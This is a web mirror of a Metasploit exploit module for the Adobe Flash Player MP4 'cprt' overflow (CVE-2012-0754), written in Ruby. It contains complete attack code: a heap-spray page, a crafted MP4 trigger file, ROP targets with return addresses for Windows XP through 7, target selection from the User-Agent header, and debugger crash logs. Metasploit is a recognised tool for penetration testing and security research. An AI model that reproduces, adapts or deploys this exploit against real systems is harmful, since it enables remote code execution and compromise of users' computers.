CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/browser/adobe_flash_mp4_cprt.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = NormalRanking

8


9
  include Msf::Exploit::Remote::HttpServer::HTML

10
  include Msf::Exploit::RopDb

11
  include Msf::Exploit::Remote::BrowserAutopwn

12
  autopwn_info({

13
    :os_name    => OperatingSystems::Match::WINDOWS,

14
    :method     => "GetVariable",

15
    :classid    => "ShockwaveFlash.ShockwaveFlash",

16
    :rank       => NormalRanking, # reliable memory corruption

17
    :javascript => true

18
  })

19


20
  def initialize(info={})

21
    super(update_info(info,

22
      'Name'           => "Adobe Flash Player MP4 'cprt' Overflow",

23
      'Description'    => %q{

24
        This module exploits a vulnerability found in Adobe Flash

25
        Player.  By supplying a corrupt .mp4 file loaded by Flash, it

26
        is possible to gain arbitrary remote code execution under the

27
        context of the user.

28


29
        This vulnerability has been exploited in the wild as part of

30
        the "Iran's Oil and Nuclear Situation.doc" e-mail attack.

31
        According to the advisory, 10.3.183.15 and 11.x before

32
        11.1.102.62 are affected.

33
      },

34
      'License'        => MSF_LICENSE,

35
      'Author'         =>

36
        [

37
          'Alexander Gavrun', # Vulnerability discovery

38
          'sinn3r',           # Metasploit module

39
          'juan vazquez'      # Metasploit module

40
        ],

41
      'References'     =>

42
        [

43
          [ 'CVE', '2012-0754' ],

44
          [ 'OSVDB', '79300'],

45
          [ 'BID', '52034' ],

46
          [ 'URL', 'http://contagiodump.blogspot.com/2012/03/mar-2-cve-2012-0754-irans-oil-and.html' ],

47
          [ 'URL', 'http://www.adobe.com/support/security/bulletins/apsb12-03.html' ]

48
        ],

49
      'Payload'        =>

50
        {

51
          'Space'    => 1000,

52
          'BadChars' => "\x00",

53
          'DisableNops' => true

54
        },

55
      'DefaultOptions'  =>

56
        {

57
          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'

58
        },

59
      'Platform'       => 'win',

60
      'Targets'        =>

61
        [

62
          # Flash Player 11.1.102.55

63
          # Flash Player 10.3.183.10

64
          [ 'Automatic', {} ],

65
          [

66
            'IE 6 on Windows XP SP3',

67
            {

68
              'Rop'    => nil,

69
              'Offset' => '0x800 - code.length',

70
              'Ret'    => 0x0c0c0c0c

71
            }

72
          ],

73
          [

74
            'IE 7 on Windows XP SP3',

75
            {

76
              'Rop'    => nil,

77
              'Offset' => '0x800 - code.length',

78
              'Ret'    => 0x0c0c0c0c

79
            }

80
          ],

81
          [

82
            'IE 8 on Windows XP SP3 with msvcrt ROP',

83
            {

84
              'Rop'    => :msvcrt,

85
              'Offset' => '0x5f4',

86
              'Ret'    => 0x77c15ed5,

87
              'ppr'    => 0x77C1CAFB

88
            }

89
          ],

90
          [

91
            'IE 8 on Windows XP SP3 with JRE ROP',

92
            {

93
              'Rop'    => :jre,

94
              'Offset' => '0x5f4',

95
              'Ret'    => 0x77c15ed5,

96
              'ppr'    => 0x77C1CAFB

97
            }

98
          ],

99
          [

100
            'IE 7 on Windows Vista',

101
            {

102
              'Rop'    => nil,

103
              'Offset' => '0x5f4',

104
              'Ret'    => 0x0c0c0c0c

105
            }

106
          ],

107
          [

108
            'IE 8 on Windows 7 SP1',

109
            {

110
              'Rop'    => :jre,

111
              'Offset' => '0x5f4',

112
              'Ret'    => 0x7c348b05,

113
              'ppr'    => 0x7c34272e

114
            }

115
          ]

116
        ],

117
      'Privileged'     => false,

118
      'DisclosureDate' => '2012-02-15',

119
      'DefaultTarget'  => 0))

120
  end

121


122
  def junk(n=4)

123
    return rand_text_alpha(n).unpack("V").first

124
  end

125


126
  def get_payload(t, cli)

127


128
    if t['Rop'].nil?

129
      code = ""

130
    else

131
      #Fix the stack to avoid anything busted

132
      code = "\x81\xC4\x54\xF2\xFF\xFF"

133
    end

134
    code << payload.encoded

135


136
    # No rop. Just return the payload.

137
    return code if t['Rop'].nil?

138


139
    rop_name = (t['Rop'] and t['Rop'] == :msvcrt) ? 'msvcrt' : 'java'

140
    rop_target = (rop_name == 'msvcrt') ? 'xp' : ''

141


142
    pivot  = [t['ppr']].pack('V*')  #POP/POP/RET

143
    pivot << [junk].pack('V*')

144
    pivot << [t.ret].pack('V*')

145


146
    code = generate_rop_payload(rop_name, code, {'target'=>rop_target})

147
    return code

148
  end

149


150
  def get_target(agent)

151
    #If the user is already specified by the user, we'll just use that

152
    return target if target.name != 'Automatic'

153


154
    if agent =~ /NT 5\.1/ and agent =~ /MSIE 6/

155
      return targets[1]  #IE 6 on Windows XP SP3

156
    elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 7/

157
      return targets[2]  #IE 7 on Windows XP SP3

158
    elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 8/

159
      return targets[3]  #IE 8 on Windows XP SP3

160
    elsif agent =~ /NT 6\.0/ and agent =~ /MSIE 7/

161
      return targets[5]  #IE 7 on Windows Vista

162
    elsif agent =~ /NT 6\.1/ and agent =~ /MSIE 8/

163
      return targets[6]  #IE 8 on Windows Vista SP1 with JRE

164
    else

165
      return nil

166
    end

167
  end

168


169
  def primer

170
    # "/test.mp4" is currently hard-coded in the swf file, so we need to add to resource

171
    hardcoded_uripath("/test.mp4")

172
  end

173


174
  def exploit

175
    @swf = create_swf

176
    super

177
  end

178


179
  def on_request_uri(cli, request)

180


181
    agent = request.headers['User-Agent']

182
    my_target = get_target(agent)

183


184
    # Avoid the attack if the victim doesn't have the same setup we're targeting

185
    if my_target.nil?

186
      print_error("Browser not supported: #{agent}")

187
      send_not_found(cli)

188
      return

189
    end

190


191
    print_status("Client requesting: #{request.uri}")

192


193
    # The SWF requests our MP4 trigger

194
    if request.uri =~ /\.mp4$/

195
      print_status("Sending MP4...")

196
      mp4 = create_mp4(my_target)

197
      send_response(cli, mp4, {'Content-Type'=>'video/mp4'})

198
      return

199
    end

200


201
    if request.uri =~ /\.swf$/

202
      print_status("Sending Exploit SWF")

203
      send_response(cli, @swf, { 'Content-Type' => 'application/x-shockwave-flash' })

204
      return

205
    end

206


207
    p = get_payload(my_target, cli)

208


209
    js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(my_target.arch))

210
    js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(my_target.arch))

211
    randnop = rand_text_alpha(rand(100) + 1)

212


213
    js_pivot = <<-JS

214
    var heap_obj = new heapLib.ie(0x20000);

215
    var code = unescape("#{js_code}");

216
    var #{randnop} = "#{js_nops}";

217
    var nops = unescape(#{randnop});

218


219
    while (nops.length < 0x80000) nops += nops;

220
    var offset = nops.substring(0, #{my_target['Offset']});

221
    var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);

222


223
    while (shellcode.length < 0x40000) shellcode += shellcode;

224
    var block = shellcode.substring(0, (0x80000-6)/2);

225


226
    heap_obj.gc();

227
    heap_obj.debug(true);

228
    for (var i=1; i < 0x1C2; i++) {

229
      heap_obj.alloc(block);

230
    }

231
    heap_obj.debug(true);

232
    JS

233


234
    js_pivot = heaplib(js_pivot, {:noobfu => true})

235


236
    swf_uri = ('/' == get_resource[-1,1]) ? get_resource[0, get_resource.length-1] : get_resource

237
    swf_uri << "/#{rand_text_alpha(rand(6)+3)}.swf"

238


239
    html = %Q|

240
<html>

241
<head>

242
<script>

243
#{js_pivot}

244
</script>

245
</head>

246
<body>

247
<center>

248
<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000"

249
id="test" width="1" height="1"

250
codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab">

251
<param name="movie" value="#{swf_uri}" />

252
<embed src="#{swf_uri}" quality="high"

253
width="1" height="1" name="test" align="middle"

254
allowNetworking="all"

255
type="application/x-shockwave-flash"

256
pluginspage="http://www.macromedia.com/go/getflashplayer">

257
</embed>

258


259
</object>

260
</center>

261


262
</body>

263
</html>

264
    |

265


266
    html = html.gsub(/^ {4}/, '')

267


268
    print_status("Sending html")

269
    send_response(cli, html, {'Content-Type'=>'text/html'})

270
  end

271


272
  def create_swf

273
    path = ::File.join( Msf::Config.data_directory, "exploits", "CVE-2012-0754.swf" )

274
    fd = ::File.open( path, "rb" )

275
    swf = fd.read(fd.stat.size)

276
    fd.close

277


278
    return swf

279
  end

280


281
  def create_mp4(target)

282
    mp4 = ""

283
    mp4 << "\x00\x00\x00\x18"

284
    mp4 << "ftypmp42"

285
    mp4 << "\x00\x00\x00\x00"

286
    mp4 << "mp42isom"

287
    mp4 << "\x00\x00\x00\x0D"

288
    mp4 << "cprt"

289
    mp4 << "\x00\xFF\xFF\xFF"

290
    mp4 << "\x00\x00\x00\x00"

291
    mp4 << "\x0c\x0c\x0c\x0c" * 2586

292


293
    return mp4

294
  end

295
end

296


297
=begin

298
C:\WINDOWS\system32\Macromed\Flash\Flash11e.ocx

299


300
(4b4.1d0): Access violation - code c0000005 (first chance)

301
First chance exceptions are reported before any exception handling.

302
This exception may be expected and handled.

303
eax=0c0c0c0c ebx=00000000 ecx=0308b1a0 edx=00000004 esi=0308b1a0 edi=00000001

304
eip=027a2626 esp=0377fec0 ebp=0377ff0c iopl=0         nv up ei pl zr na pe nc

305
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246

306
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\WINDOWS\system32\Macromed\Flash\Flash11e.ocx -

307
Flash11e+0x52626:

308
027a2626 ff5008          call    dword ptr [eax+8]    ds:0023:0c0c0c14=????????

309


310
C:\WINDOWS\system32\Macromed\Flash\Flash10x.ocx

311


312
(510.9b4): Access violation - code c0000005 (first chance)

313
First chance exceptions are reported before any exception handling.

314
This exception may be expected and handled.

315
eax=0c0c0c0c ebx=03e46810 ecx=0396b160 edx=00000004 esi=03e46cd4 edi=00000000

316
eip=10048b65 esp=0428fd10 ebp=0428feb4 iopl=0         nv up ei pl zr na pe nc

317
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246

318
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\WINDOWS\system32\Macromed\Flash\Flash10x.ocx -

319
Flash10x+0x48b65:

320
10048b65 ff5008          call    dword ptr [eax+8]    ds:0023:0c0c0c14=????????

321
=end

322


323